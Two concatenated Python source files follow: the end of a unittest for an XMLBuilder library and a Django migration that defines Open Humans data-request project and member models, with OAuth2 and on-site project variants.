self.assertEqual(str(xml),"<root>text1text2<some_node /></root>")
#---------------------------------------------------------------------------
def testFormat(self):
x = XMLBuilder('utf-8',format = True)
with x.root():
x << ('array',)
with x.array(len = 10):
with x.el(val = 0):
pass
with x.el('xyz',val = 1):
pass
x << ("el","abc",{'val':2}) << ('el',dict(val=3))
x << ('el',dict(val=4)) << ('el',dict(val='5'))
with x('sup-el',val = 23):
x << "test "
self.assertEqual(str(x),result1)
if __name__ == '__main__':
unittest.main()
|
import autoslug.fields
import common.utils
import datetime
from django.conf import settings
import django.contrib.postgres.fields
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
import open_humans.storage
import private_sharing.models
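# Initial migration for the private_sharing app: creates DataRequestProject,
# DataRequestProjectMember and the OAuth2/on-site project subclasses.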
class Migration(migrations.Migration):
initial = True
dependencies = [
('open_humans', '0003_auto_20151223_1827'),
('oauth2_provider', '__first__'),
('open_humans', '0004_member_badges'),
]
operations = [
migrations.CreateModel(
name='DataRequestProject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('is_study', models.BooleanField(choices=[(True, 'Study'), (False, 'Activity')], help_text='A "study" is doing human subjects research and must have Institutional Review Board approval or equivalent ethics board oversight. Activities can be anything else, e.g. data visualizations.', verbose_name='Is this project a study or an activity?')),
('name', models.CharField(max_length=100, verbose_name='Project name')),
('leader', models.CharField(max_length=100, verbose_name='Leader(s) or principal investigator(s)')),
('organization', models.CharField(max_length=100, verbose_name='Organization or institution')),
('contact_email', models.EmailField(max_length=254, verbose_name='Contact email for your project')),
('info_url', models.URLField(verbose_name='URL for general information about your project')),
('short_description', models.CharField(max_length=140, verbose_name='A short description')),
('long_description', models.TextField(max_length=1000, verbose_name='A long description')),
('active', models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], default=True, help_text='"Active" status is required to perform authorization\nprocesses, including during drafting stage. If a project is not active,\nit won\'t show up in listings, and new data sharing authorizations cannot occur.\nProjects which are "active" but not approved may have some information shared\nin an "In Development" section, so Open Humans members can see potential\nupcoming studies.')),
('badge_image', models.ImageField(blank=True, help_text="A badge that will be displayed on the user's profile once they've connected your project.", max_length=1024, storage=open_humans.storage.PublicStorage(), upload_to=private_sharing.models.badge_upload_path)),
('request_sources_access', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), help_text='List of sources this project is requesting access to on Open Humans.', size=None, verbose_name="Data sources you're requesting access to")),
('request_message_permission', models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], help_text='Permission to send messages to the member. This does not grant access to their email address.', verbose_name='Are you requesting permission to message users?')),
('request_username_access', models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], help_text="Access to the member's username. This implicitly enables access to anything the user is publicly sharing on Open Humans. Note that this is potentially sensitive and/or identifying.", verbose_name='Are you requesting Open Humans usernames?')),
('approved', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('api_access_secret', models.CharField(max_length=64)),
],
options={
'verbose_name_plural': 'Data request activities',
},
),
migrations.CreateModel(
name='DataRequestProjectMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id_code', models.CharField(max_length=16)),
('message_permission', models.BooleanField()),
('username_shared', models.BooleanField()),
('sources_shared', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), size=None)),
('member', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='open_humans.Member')),
],
),
migrations.CreateModel(
name='OAuth2DataRequestProject',
fields=[
('datarequestproject_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='private_sharing.DataRequestProject')),
('enrollment_url', models.URLField(help_text="The URL we direct members to if they're interested in sharing data with your project.", verbose_name='Enrollment URL')),
('redirect_url', models.CharField(help_text='The return URL for our "authorization code" OAuth2 grant\n process. You can <a target="_blank" href="">read more about OAuth2\n "authorization code" transactions here</a>.', max_length=256, verbose_name='Redirect URL')),
('application', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.OAUTH2_PROVIDER_APPLICATION_MODEL)),
],
options={
'verbose_name': 'OAuth2 data request project',
},
bases=('private_sharing.datarequestproject',),
),
migrations.CreateModel(
name='OnSiteDataRequestProject',
fields=[
('datarequestproject_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='private_sharing.DataRequestProject')),
('consent_text', models.TextField(help_text='The "informed consent" text that describes your project to Open Humans members.')),
('post_sharing_url', models.URLField(blank=True, help_text='If provided, after authorizing sharing the\nmember will be taken to this URL. If this URL includes "PROJECT_MEMBER_ID"\nwithin it, we will replace that with the member\'s project-specific\nproject_member_id. This allows you to direct them to an external survey you\noperate (e.g. using Google Forms) where a pre-filled project_member_id field\nallows you to connect those responses to corresponding data in Open Humans.', verbose_name='Post-sharing URL')),
],
options={
'verbose_name': 'On-site data request project',
},
bases=('private_sharing.datarequestproject',),
),
migrations.AddField(
model_name='datarequestprojectmember',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='project_members', to='private_sharing.DataRequestProject'),
),
migrations.AddField(
model_name='datarequestproject',
name='coordinator',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='open_humans.Member'),
),
migrations.AlterField(
model_name='datarequestproject',
name='long_description',
field=models.TextField(max_length=1000, verbose_name='A long description (1000 characters max)'),
),
migrations.AlterField(
model_name='datarequestproject',
name='short_description',
field=models.CharField(max_length=140, verbose_name='A short description (140 characters max)'),
),
migrations.AlterField(
model_name='datarequestprojectmember',
name='member',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='open_humans.Member'),
),
migrations.RenameField(
model_name='datarequestprojectmember',
old_name='user_id_code',
new_name='project_member_id',
),
migrations.AlterField(
model_name='datarequestprojectmember',
name='project_member_id',
field=models.CharField(max_length=16, unique=True),
),
migrations.AlterField(
model_name='datarequestproject',
name='request_sources_access',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), default=list, help_text='List of sources this project is requesting access to on Open Humans.', size=None, verbose_name="Data sources you're requesting access to"),
),
migrations.AlterField(
model_name='datarequestproject',
name='active',
field=models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], default=True, help_text='"Active" status is required to perform authorization\nprocesses, including during drafting stage. If a project is not active, it\nwon\'t show up in listings, and new data sharing authorizations cannot occur.\nProjects which are "active" but not approved may have some information shared\nin an "In Development" section, so Open Humans members can see potential\nupcoming studies.'),
),
migrations.AddField(
model_name='datarequestprojectmember',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 3, 4, 5, 14, 50, 931889, tzinfo=utc)),
preserve_default=False,
),
migrations.AlterField(
model_name='datarequestprojectmember',
name='message_permission',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='datarequestprojectmember',
name='sources_shared',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), default=list, size=None),
),
migrations.AlterField(
model_name='datarequestprojectmember',
name='username_shared',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='datarequestproject',
name='slug',
field=autoslug.fields.AutoSlugField(editable=False, populate_from='name', unique=True),
),
migrations.AddField(
model_name='datarequestprojectmember',
name='revoked',
field=models.BooleanField(default=False),
),
migrations.AlterModelOptions(
name='datarequestproject',
options={},
),
migrations.AddField(
model_name='datarequestprojectmember',
name='authorized',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='datarequestproject',
name='slug',
field=autoslug.fields.AutoSlugField(always_update=True, editable=False, populate_from='name', unique=True),
),
migrations.AddField(
model_name='datarequestproject',
name='is_academic_or_nonprofit',
field=models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], default=False, verbose_name='Is this institution or organization an academic institution or non-profit organization?'),
preserve_default=False,
),
migrations.AddField(
model_name='datarequestprojectmember',
name='consent_text',
field=models.TextField(blank=True),
),
migrations.RemoveField(
model_name='datarequestproject',
name='api_access_secret',
),
migrations.AddField(
model_name='datarequestproject',
name='master_access_token',
field=models.CharField(default=common.utils.generate_id, max_length=64),
),
migrations.AddField(
model_name='datarequestprojectmember',
name='joined',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='datarequestproject',
name='request_sources_access',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), blank=True, default=list, help_text='List of sources this project is requesting access to on Open Humans.', size=None, verbose_name="Data sources you're requesting access to"),
),
migrations.AlterField(
model_name='datarequestproject',
name='organization',
field=models.CharField(blank=True, max_length=100, verbose_name='Organization or institution'),
),
migrations.AddField(
model_name='datarequestproject',
name='returned_data_description',
field=models.CharField(blank=True, help_text="Leave this blank if your project doesn't plan to add or return new data for your members.", max_length=140, verbose_name='Description of data you plan to upload to member accounts (140 characters max)'),
),
migrations.AlterField(
model_name='datarequestproject',
name='active',
field=models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], default=True, help_text='"Active" status is required to perform authorization\nprocesses, including during drafting stage. If a project is not active, it\nwon\'t show up in listings of activities that can be joined by participants, and\nnew data sharing authorizations cannot occur. Projects which are "active" but\nnot approved may have some information shared in an "In Development" section,\nso Open Humans members can see potential upcoming studies. Removing "active"\nstatus from a project will not remove any uploaded files from a project\nmember\'s profile.'),
),
migrations.AddField(
model_name='datarequestproject',
name='token_expiration_date',
field=models.DateTimeField(default=private_sharing.models.now_plus_24_hours),
),
migrations.AddField(
model_name='datarequestproject',
name='token_expiration_disabled',
field=models.BooleanField(default=False),
),
]
|